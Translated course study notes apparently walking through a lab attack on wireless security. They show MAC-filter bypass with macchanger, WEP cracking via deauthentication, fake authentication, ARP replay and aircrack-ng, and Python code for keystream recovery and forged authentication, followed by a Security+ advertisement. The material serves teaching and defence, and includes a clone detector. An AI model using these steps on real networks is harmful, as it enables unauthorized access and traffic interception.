
[安全牛 Study Notes] MAC Address Binding Attack

Tags: information security, encryption, Security+

MAC address binding attack
MAC binding
Administrators mistakenly treat MAC binding as a security mechanism
It only restricts which client MAC addresses may associate; the MAC is sent in cleartext in every 802.11 frame header and any card can be set to any address, so an attacker simply copies an allowed one
Preparing the AP
Basic AP configuration
Open authentication
Enable the wireless MAC filter
Change our MAC address to bypass the filter

[email protected]:~# ifconfig

eth0 Link encap:Ethernet HWaddr 08:00:27:fd:1c:9d
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)

wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

[email protected]:~# service network-manager stop

[email protected]:~# airmon-ng check kill
Killing these processes:

PID Name
718 dhclient
931 wpa_supplicant

[email protected]:~# airmon-ng start wlan2
No interfering processes found
PHY Interface Driver Chipset

phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)

[email protected]:~# iwconfig
eth0 no wireless extensions

wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions

[email protected]:~# iwlist wlan2mon channel
wlan2mon 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.457 GHz (Channel 10)

[email protected]:~# iw dev wlan2mon set channel 11 // switch the monitor interface to channel 11

[email protected]:~# iwlist wlan2mon channel
wlan2mon 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airodump-ng wlan2mon // listen for all nearby APs and clients

[email protected]:~# airmon-ng stop wlan2mon

[email protected]:~# airmon-ng start wlan2 11 // start monitor mode directly on channel 11

[email protected]:~# iwlist wlan2mon channel
wlan2mon 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airodump-ng wlan2mon // listen for all nearby APs and clients

------------------------------------------------------------

[email protected]:~# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:fd:1c:9d
inet addr:192.168.20.8 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fefd:1c9d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1200 (1.1 KiB) TX bytes:1200 (1.1 KiB)

wlan2 Link encap:Ethernet HWaddr 08:57:00:0c:96:68
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:20 errors:0 dropped:0 overruns:0 frame:0
TX packets:20 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

[email protected]:~# airmon-ng start wlan2 11 // start monitor mode directly on channel 11
Found 2 processes that could cause trouble.
If airodump, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
1944 avahi-daemon
1945 avahi-daemon

PHY Interface Driver Chipset

phy0 wlan2 ath9k_htc Atheros Communications, Inc. AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)

[email protected]:~# iwconfig
eth0 no wireless extensions

wlan2mon IEEE 802.11bgn Mode:Monitor Frequency:2.462 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off

lo no wireless extensions

[email protected]:~# iwlist wlan2mon channel
wlan2mon 13 channels in total; available frequencies :
Channel 01 : 2.412 GHz
Channel 02 : 2.417 GHz
Channel 03 : 2.422 GHz
Channel 04 : 2.427 GHz
Channel 05 : 2.432 GHz
Channel 06 : 2.437 GHz
Channel 07 : 2.442 GHz
Channel 08 : 2.447 GHz
Channel 09 : 2.452 GHz
Channel 10 : 2.457 GHz
Channel 11 : 2.462 GHz
Channel 12 : 2.467 GHz
Channel 13 : 2.472 GHz
Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airodump-ng wlan2mon -c 11 // listen for all APs and clients on channel 11

[email protected]:~# airodump-ng wlan2mon -c 11 --bssid EC:26:CA:DC:29:B6 // lock onto the target AP and list its associated clients (these are the MACs the filter allows)

[email protected]:~# ifconfig wlan0 down

[email protected]:~# macchanger -m 68:3E:34:30:0F:AA wlan0
Current MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
Permanent MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
New MAC: 68:3e:34:30:0f:aa (unknown)

[email protected]:~# ifconfig wlan0 up

[email protected]:~# ifconfig

[email protected]:~# airodump-ng wlan2mon -c 11 --bssid 68:3e:34:30:0f:aa
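The procedure above relies on one fact: the station and BSSID addresses sit in the cleartext 802.11 header, so airodump-ng shows exactly which MACs the filter allows, and one `macchanger`/`ip link` call is enough to reuse them. The example below is added here and is not code from the course notes or from the aircrack-ng project. It builds constructed 802.11 data-frame headers using the client (68:3e:34:30:0f:aa) and AP (EC:26:CA:DC:29:B6) addresses from this lab, parses the addresses the way a sniffer does, emits the iproute2 form of the MAC-cloning step, and adds the check a defender still has: two radios sharing one MAC interleave two sequence counters, so the 802.11 sequence number jumps backwards. The sample frames, the sequence numbers and the detection threshold are my own assumptions.

```python
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_data_frame(src: str, bssid: str, dst: str, seq: int, to_ds: bool = True) -> bytes:
    """Constructed sample: a minimal 802.11 data frame header (24 bytes, no radiotap
    header, no body). Frame Control byte 0 = 0x08 (type Data, subtype 0); byte 1 carries
    the ToDS flag (station -> AP) or the FromDS flag (AP -> station)."""
    flags = 0x01 if to_ds else 0x02
    if to_ds:   # addr1 = BSSID, addr2 = SA (the station), addr3 = DA
        a1, a2, a3 = bssid, src, dst
    else:       # addr1 = DA (the station), addr2 = BSSID, addr3 = SA
        a1, a2, a3 = dst, bssid, src
    return (struct.pack("<BBH", 0x08, flags, 0)            # FC, duration/ID
            + mac_bytes(a1) + mac_bytes(a2) + mac_bytes(a3)
            + struct.pack("<H", (seq & 0xFFF) << 4))       # seq ctrl: 12-bit seq, 4-bit frag


def parse_dot11(frame: bytes) -> dict:
    """Pull the addresses out of an 802.11 frame header. None of this is protected by
    WEP/WPA, which is why a MAC filter only tells an attacker which MACs to clone."""
    ftype = (frame[0] >> 2) & 0x3
    to_ds, from_ds = bool(frame[1] & 0x01), bool(frame[1] & 0x02)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    seq = struct.unpack("<H", frame[22:24])[0] >> 4
    info = {"type": ftype, "to_ds": to_ds, "from_ds": from_ds, "seq": seq,
            "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3),
            "bssid": None, "station": None}
    if ftype == 2:  # data: which address is the AP depends on the DS bits
        if to_ds and not from_ds:
            info["bssid"], info["station"] = mac_str(a1), mac_str(a2)
        elif from_ds and not to_ds:
            info["bssid"], info["station"] = mac_str(a2), mac_str(a1)
        elif not to_ds and not from_ds:
            info["bssid"], info["station"] = mac_str(a3), mac_str(a2)
        # both bits set: 4-address WDS frame, no single BSSID
    elif ftype == 0:  # management: addr3 is always the BSSID
        info["bssid"] = mac_str(a3)
        info["station"] = mac_str(a2) if a2 != a3 else mac_str(a1)
    return info


def clone_mac_commands(iface: str, mac: str) -> list:
    """The bypass itself: iproute2 equivalent of the page's 'ifconfig down; macchanger -m;
    ifconfig up' step, returned as argv lists (not executed here)."""
    return [["ip", "link", "set", "dev", iface, "down"],
            ["ip", "link", "set", "dev", iface, "address", mac],
            ["ip", "link", "set", "dev", iface, "up"]]


def detect_mac_clone(frames: list) -> list:
    """Defender's check: a single radio numbers its frames monotonically (mod 4096).
    A cloned MAC interleaves a second counter, so the sequence number moves backwards.
    Threshold (a backward step of more than half the counter space) is an assumption.
    Returns (frame index, transmitter mac, previous seq, seq) per backward jump."""
    last, hits = {}, []
    for idx, frame in enumerate(frames):
        info = parse_dot11(frame)
        tx = info["addr2"]  # transmitter address in all 3-address frames
        if tx in last and (info["seq"] - last[tx]) % 4096 > 2048:
            hits.append((idx, tx, last[tx], info["seq"]))
        last[tx] = info["seq"]
    return hits


if __name__ == "__main__":
    legit, ap = "68:3e:34:30:0f:aa", "ec:26:ca:dc:29:b6"
    capture = [build_data_frame(legit, ap, BROADCAST, s) for s in (100, 101, 102)]
    capture += [build_data_frame(legit, ap, BROADCAST, s) for s in (7, 103, 8)]  # clone joins
    print("allowed station seen in cleartext:", parse_dot11(capture[0])["station"])
    print("clone with:", [" ".join(c) for c in clone_mac_commands("wlan2", legit)])
    print("backward sequence jumps:", detect_mac_clone(capture))
```

The detector is a heuristic: retransmissions repeat a sequence number (delta 0) and are not flagged, and a station that reboots restarts its counter once, so a single hit is a hint while a sustained pattern of two interleaved counters is the signature of a cloned MAC. It is the kind of check a wireless IDS can run; the MAC filter itself gives the AP nothing to check.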

WEP attacks
WEP shared key cracking
How WEP key cracking works
The 24-bit IV is not truly random, and the IV space is tiny
With only 2^24 possible IVs, an IV is certain to repeat within 2^24 packets (and in practice far sooner)
Collect a large number of IVs, find repeated IVs and their corresponding ciphertexts, and statistically recover the shared key
Every ARP reply from the AP carries a fresh IV
Given enough IVs, a WEP key of any complexity can be recovered

[email protected]:~# airodump-ng wlan2mon

[email protected]:~# airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan2mon

WEP shared key cracking, step by step
Start monitor mode
Start capturing and write the capture to a file
Deauthenticate a client so its shared-key re-authentication is captured; airodump-ng saves the recovered keystream as a .xor file
Use the .xor file to fake-authenticate and associate with the AP
Run the ARP replay attack
Deauthenticate a client again to trigger fresh ARP packets
Once enough DATA has been collected, crack the key
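The two lists above state why WEP falls (IV reuse) and why a captured shared-key handshake lets aireplay-ng associate without the key (the .xor file). The example below works both through in code; it is added here and is not code from the course notes or from aircrack-ng. It uses a textbook RC4 and the WEP frame layout (3-byte cleartext IV, key-index byte, CRC-32 ICV encrypted with the data). The key is the one aircrack-ng recovers later on this page (1234567890123); the IV, the 128-byte challenges and the packet contents are constructed for the demonstration.

```python
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP seeds it with IV || shared key, so once the key is
    fixed the keystream depends only on the 24-bit IV."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, appended before encryption."""
    return zlib.crc32(plaintext).to_bytes(4, "little")


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body as sent on air: IV (3 bytes, cleartext) | key index | RC4(plaintext | ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + icv(plaintext))


def wep_decrypt(key: bytes, body: bytes) -> tuple:
    """What the AP does on receipt; raises if the ICV does not match."""
    iv, ct = body[:3], body[4:]
    pt_icv = rc4(iv + key, ct)
    pt, tag = pt_icv[:-4], pt_icv[-4:]
    if icv(pt) != tag:
        raise ValueError("bad ICV")
    return iv, pt


# --- Shared Key Authentication: why the handshake leaks a keystream -------------------

def recover_keystream(challenge: bytes, encrypted_response: bytes) -> tuple:
    """Sniffing auth frame 2 (cleartext 128-byte challenge) and frame 3 (the client's WEP
    encryption of it) gives keystream = (challenge | ICV) XOR ciphertext for that IV.
    This is the content airodump-ng writes to the <prefix>-<BSSID>.xor file."""
    iv = encrypted_response[:3]
    return iv, xor(challenge + icv(challenge), encrypted_response[4:])


def forge_auth_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Fake authentication (aireplay-ng -1 ... -y file.xor): answer a fresh challenge
    without the key by reusing the IV whose keystream we hold."""
    plain = new_challenge + icv(new_challenge)
    if len(plain) > len(keystream):
        raise ValueError("keystream too short for this challenge")
    return iv + b"\x00" + xor(plain, keystream[: len(plain)])


# --- IV reuse: two frames under the same IV leak each other's plaintext ---------------

def iv_reuse_leak(body_a: bytes, body_b: bytes, plaintext_a: bytes) -> bytes:
    """Same IV => same keystream, so C_a XOR C_b = P_a XOR P_b. When P_a is predictable
    (an ARP request has a fixed LLC/SNAP + ARP header), P_b falls out with no key."""
    if body_a[:3] != body_b[:3]:
        raise ValueError("different IVs: no reuse")
    n = min(len(body_a), len(body_b)) - 4
    return xor(xor(body_a[4:4 + n], body_b[4:4 + n]), (plaintext_a + icv(plaintext_a))[:n])


if __name__ == "__main__":
    key = b"1234567890123"            # the 104-bit key recovered on this page
    iv = b"\x0b\x02\x03"              # constructed IV; the client picks it, the AP accepts any
    challenge = bytes(range(128))     # constructed stand-in for the AP's random challenge
    iv2, ks = recover_keystream(challenge, wep_encrypt(key, iv, challenge))
    forged = forge_auth_response(iv2, ks, bytes(range(127, -1, -1)))
    print("AP accepts forged auth:", wep_decrypt(key, forged)[1] == bytes(range(127, -1, -1)))
    arp = bytes.fromhex("aaaa030000000806" + "0001080006040001")  # LLC/SNAP + ARP request head
    leaked = iv_reuse_leak(wep_encrypt(key, iv, arp), wep_encrypt(key, iv, b"top secret"), arp)
    print("leaked without key:", leaked[:10])
```

The forged response is accepted because the AP checks only that the decrypted body equals its challenge and the ICV verifies; both are satisfied by any party holding 132 bytes of keystream for that IV, which is why the notes say shared-key WEP is no harder than open WEP (and why `-y` needs a .xor file). The statistical key recovery that aircrack-ng performs on the collected IVs is a separate step that this example does not implement.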

[email protected]:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-B6.xor wep-01.kismet.netxml

[email protected]:~# cat wep-01-EC-26-CA-DC-29-B6.xor // binary keystream (PRGA) recovered from the captured shared-key handshake; it is not the key itself

[email protected]:~# aireplay-ng --help

Aireplay-ng 1.2 rc2 - (C) 2006-2014 Thomas d'Otreppe
http://www.aircrack-ng.org

usage: aireplay-ng <options> <replay interface>

Filter options:

-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length
-n len : maximum packet length
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
-D : disable AP detection

Replay options:

-x nbpps : number of packets per second
-p fctrl : set frame control word (hex)
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-g value : change ring buffer size (default: 8)
-F : choose first matching packet

Fakeauth attack options:

-e essid : set target AP SSID
-o npckts : number of packets per burst (0=auto, default: 1)
-q sec : seconds between keep-alives
-Q : send reassociation requests
-y prga : keystream for shared key auth
-T n : exit after retry fake auth request n time

Arp Replay attack options:

-j : inject FromDS packets

Fragmentation attack options:

-k IP : set destination IP in fragments
-l IP : set source IP in fragments

Test attack options:

-B : activates the bitrate test

Source options:

-i iface : capture packets from this interface
-r file : extract packets from this pcap file

Miscellaneous options:

-R : disable /dev/rtc usage
--ignore-negative-one : if the interface's channel can't be determined,
ignore the mismatch, needed for unpatched cfg80211

Attack modes (numbers can still be used):

--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)

--help : Displays this usage screen
[email protected]:~# aireplay-ng -1 60 -e kifi -y wep-01-EC-26-CA-DC-29-B6.xor -a EC:26:CA:DC:29:B6 -h 08:57:00:0C:96:68 wlan2mon
// Attack mode 1 (fake authentication): re-authenticate every 60 seconds; -e target ESSID, -y keystream (.xor) file for shared-key auth, -a AP BSSID, -h MAC address of our own card
21:44:21 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel

21:44:21 Sending Authentication Request (Shared Key) [ACK]
21:44:21 Authentication 1/2 successful
21:44:21 Sending encrypted challenge. [ACK]
21:44:21 Authentication 2/2 successful
21:44:21 Sending Association Request [ACK]
21:44:21 Association successful :-) (AID: 1)

21:44:36 Sending keep-alive packet [ACK]
21:44:51 Sending keep-alive packet [ACK]
21:45:06 Sending Authentication Request (Shared Key) [ACK]
21:45:21 Authentication 1/2 successful
21:45:21 Sending encrypted challenge. [ACK]
21:45:21 Authentication 2/2 successful
21:45:21 Sending Association Request [ACK]
21:45:21 Association successful :-) (AID: 1)

21:45:36 Sending keep-alive packet [ACK]
21:45:51 Sending keep-alive packet [ACK]
21:46:06 Sending keep-alive packet [ACK]
21:47:06 Sending Authentication Request (Shared Key) [ACK]
21:47:21 Authentication 1/2 successful
21:47:21 Sending encrypted challenge. [ACK]
21:47:21 Authentication 2/2 successful
21:47:21 Sending Association Request [ACK]
21:47:21 Association successful :-) (AID: 1)

21:47:36 Sending keep-alive packet [ACK]

[email protected]:~# aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan2mon // deauthenticate the legitimate client (one burst of 64 directed deauth frames)
21:54:29 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel 11
21:54:29 Sending 64 directed DeAuth. STMAC: [68:3E:34:30:0F:AA] [ 2|64 ACKs]

[email protected]:~# aireplay-ng -0 10 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan2mon

[email protected]:~# aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 08:57:00:0C:96:68 wlan2mon
21:42:17 Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel 11
Saving ARP requests in replay_arp-1105-214217.cap
You should also start airodump-ng to capture replies.
Read 20814 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

[email protected]:~# aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlan2mon // kick the client off so that it reconnects and sends fresh ARP requests for the replay

[email protected]:~# ls
wep-01.csv wep-01.kismet.csv wep-01-EC-26-CA-DC-29-B6.xor wep-01.kismet.netxml replay_arp-1105-214217.cap wep-01.cap

[email protected]:~# wireshark wep-01.cap

[email protected]:~# aircrack-ng wep-01.cap

Aircrack-ng 1.2 rc2

KB depth bytes(vote)
0 0/ 2 31(247040) 80(195072) E0(193280) 51(193024) 0A(192000) 4B(190464) 85(190464) BE(190208) 78(189696) EF(189696) 2C(189184)
1 1/ 2 77(198912) A1(195584) 2F(195816) 95(193024) E6(192512) B5(190976) 1F(189696) 60(189184) AE(188672) 7A(188416) BB(188426)
2 8/ 2 9B(189184) 3A(188672) D7(188672) EC(188672) 6C(188416) 25(187648) FE(187648) 9A(186880) E4(186880) BB(186624) 27(185856)
3 0/ 4 A2(240896) 4E(190464) A5(189952) FB(189184) DB(188928) 18(188672) 12(188160) 28(187648) 42(187136) F1(186880) 0E(186624)
4 91/ 4 E7(178944) 74(178688) AC(178688) 5F(178432) 65(178432) 90(178432) C6(178176) 3E(177920) 42(177920) B7(177920) BA(177920)

KEY FOUND! [ 31:32:33:34:35:36:37:38:39:30:31:32:33 ] (ASCII: 1234567890123 )
Decrypted correctly: 100%

FAKE AUTHENTICATION
Every WEP attack starts with a fake authentication, so that the AP accepts frames from our MAC
Fake authentication by itself generates no ARP packets (and therefore no new IVs)
aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>
aireplay-ng -1 60 -o 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
-1 60: re-authenticate every 60 seconds
-o 1: send only one set of packets per authentication attempt
-q 10: send a keep-alive frame every 10 seconds
FAKE AUTHENTICATION failure causes
Some APs check the OUI (first three bytes) of the client MAC, so a random MAC may be rejected
MAC address filtering on the AP
"Denied (Code 1) is WPA in use" means the AP runs WPA/WPA2
WPA/WPA2 does not support fake authentication
Use a real MAC address (for example one cloned from a legitimate client)
Stay physically close to the AP
Make sure you are listening on the correct channel
FAKE AUTHENTICATION troubleshooting
Get physically close enough to the target
Use the same wireless standard as the target (b, g or n)
Clients may ignore broadcast frames; target a specific client

ARP replay
Capture a legitimate ARP request and replay it to the AP
Each reply the AP sends carries a new IV, so the capture fills with (weak) IVs

aireplay-ng -3 -b <AP MAC> -h <Source MAC> <interface name>
-h: MAC of a legitimate client, or the attacker's own MAC once it has fake-authenticated
Watch the Data column in airodump-ng
64-bit key: about 250,000 IVs
128-bit key: about 1,500,000 IVs

Cracking WEP
aircrack-ng wep.cap

These notes were written by a student of the 安全牛 classroom; to watch this course or read more information security material, visit the 安全牛 classroom.

Why is Security+ the hottest certification of the "Internet Plus" era?

First, an introduction to Security+

Security+ is a vendor-neutral third-party certification issued by CompTIA (the Computing Technology Industry Association, USA). Together with CISSP and ITIL it is counted among the ten most popular international IT certifications; where CISSP emphasises information security management, Security+ emphasises security technology and operations.

Holding the certification demonstrates competence in network security, compliance and operational security, threats and vulnerabilities, application, data and host security, access control and identity management, and cryptography. Because the exam is not easy and the credential is well regarded, it has been widely adopted by enterprises and security professionals worldwide.

Why is Security+ so popular?

Reason one: among information security certifications, those that emphasise technology are almost absent, and Security+ fills that gap.

The security certifications currently recognised in the industry are mainly CISP and CISSP, but both lean toward security management; their technical content is broad and shallow and the exams skim over it. CISSP also requires five years of information security experience, and CISP requires a college diploma plus four years of experience, which closes the door on capable, ambitious younger people. In practice, whether you are job hunting, seeking a promotion or being named on a bid, certifications are indispensable, and this puts younger people at a disadvantage. Security+ removes those obstacles: because it focuses on security technology, it sets no particular experience requirement. Anyone with an IT background who wants to progress can study for and sit the exam.

Reason two: a tool for IT operations staff to advance their careers.

In banking, securities, insurance, telecommunications and similar industries there are large numbers of IT operations staff, and their work spans a wide range: it is a composite technical role covering networks, systems, security, application architecture and storage. It may lack the drama of the programmer's life, but it has its own hardships. Staring at screens and machines day after day, it is easy to feel lost about career development. The Security+ international certification lets ambitious operations staff learn network security and put it into practice, steer their careers toward security, and help address the domestic shortage of security talent. And even without a career change, learning security and holding a security certification is essential to doing operations work well.

Reason three: practical, international, convenient to sit, and reasonably priced!

CompTIA, a leading global body in the ICT field, is professional, fair and impartial in certifying information security talent. Security+ is operations-oriented and closely tied to the daily work of front-line engineers, making it suitable for IT staff in banks, securities firms, insurers, internet companies and the like. As an international certification it is widely recognised in 147 countries.

In the current wave of interest in information security, talent is the key to progress, and domestic security talent is in very short supply; Security+ is set to become the hottest security certification.

This article is from the "11662938" blog; please keep this attribution: http://11672938.blog.51cto.com/11662938/1967652
